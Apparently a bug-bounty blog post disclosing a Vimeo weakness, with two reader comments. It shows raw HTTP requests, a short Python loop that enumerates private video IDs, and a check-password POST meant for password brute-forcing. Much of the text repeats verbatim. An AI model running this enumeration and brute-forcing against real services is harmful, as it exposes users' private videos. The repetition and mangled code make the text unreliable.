Recent Studies of data breach will give us an idea how weak passwords policies/Missing rate-limiting in sensitive details
are one of the top causes of data breaches, and I find that information
to be unfortunate, specially when it is preventable.
Recently "A Facebook bounty hunter Anand Prakash from India recently discovered a Password Reset Vulnerability,
a simple yet critical vulnerability that could have given an attacker
endless opportunities to brute force a 6-digit code and reset any
account's password"
The Bug because of its simplicity to carry out the attack had been rewarded heavily by Facebook.Because such bug don't require a heavy know how from attacker side.
This is one my finding on the vimeo,though it was not rewarded and closed as Informative.But as the bug was enough simple that it can be used by attacker to dump the private video hosted on vimeo.(which is one of the key feature of vimeo vid hosting)
A video is made private as users wants to make its specific to the viewers who he wants to ,so how as an attacker one could try to dump the private video hosted on the vimeo website.what he needs
1.He needs all the private video url hosted on vimeo
2.He needs the password for the said video link as well
1.Achieving step 1:Dumping private video url link:-
when you try to access a private video link on url given below
https://player.vimeo.com/video/16691xxxx/
Video ID:16691xxxx
Request:-
GET /video/16691xxxx/ HTTP/1.1
Host: player.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: __utma=256147786.835234581.1463500113.1463500113.1463503110.2; __utmz=256147786.1463500113.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); player=""; vuid=610334891.557764322; _ga=GA1.2.8849839.1463503486; _ceg.s=o7byim; _ceg.u=o7byim
Connection: keep-alive
Response : of Page contains private video
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Xss-Protection: 1; mode=block
Content-Security-Policy: redacted
1.He needs all the private video url hosted on vimeo
2.He needs the password for the said video link as well
1.Achieving step 1:Dumping private video url link:-
when you try to access a private video link on url given below
https://player.vimeo.com/video/16691xxxx/
Video ID:16691xxxx
Request:-
GET /video/16691xxxx/ HTTP/1.1
Host: player.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: __utma=256147786.835234581.1463500113.1463500113.1463503110.2; __utmz=256147786.1463500113.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); player=""; vuid=610334891.557764322; _ga=GA1.2.8849839.1463503486; _ceg.s=o7byim; _ceg.u=o7byim
Connection: keep-alive
Response : of Page contains private video
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Xss-Protection: 1; mode=block
Content-Security-Policy: redacted
X-Content-Type-Options: nosniff
<!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,user-scalable=no"><meta name=robots content=noindex><title>Private Video on viemo
Now if an attcker setup a python script to brute the video ID and grep the response for "Private Video on vimeo",then he can have all the url of private video hosted on vimeo.
2.
<!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,user-scalable=no"><meta name=robots content=noindex><title>Private Video on viemo
Now if an attcker setup a python script to brute the video ID and grep the response for "Private Video on vimeo",then he can have all the url of private video hosted on vimeo.
Python code:-(here i am just trying to dump video series from 100 to 400[it could be improvised as requirement]
import requests for i in range(100,400): videoid='166947'+str(i) r=requests.get('https://player.vimeo.com/video/'+videoid) msg= r.text s="Private Video on Vimeo"
if s in msg: print "video is private its is %s" %(videoid) else: print "not private"
2.
Password for private videos
Now as there is no rate-limitation is implemented on url ,attacker can brute th password field to bypass the authentication for viewing the video.
https://player.vimeo.com/video/166xxxxx/check-password
Post request:-
POST /video/1669xxxxx/check-password HTTP/1.1
Host: player.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
password={password cab be bruteforced}&Watch%20Video
https://player.vimeo.com/video/166xxxxx/check-password
Post request:-
POST /video/1669xxxxx/check-password HTTP/1.1
Host: player.vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
password={password cab be bruteforced}&Watch%20Video
Though while submitting the bug I forgot to read the Vimeo checklist,but the simplicity of attack could not be ignored here.Anyways its their discretion.As I didn't get the answer from them,so thought to publish it here.
Co-incidence we're to use vimeo .. second, bruiting of password is also required. Good approach.
ReplyDeleteWhat to do ?They must have feeling security with it.Whereas security is always Myth.
ReplyDelete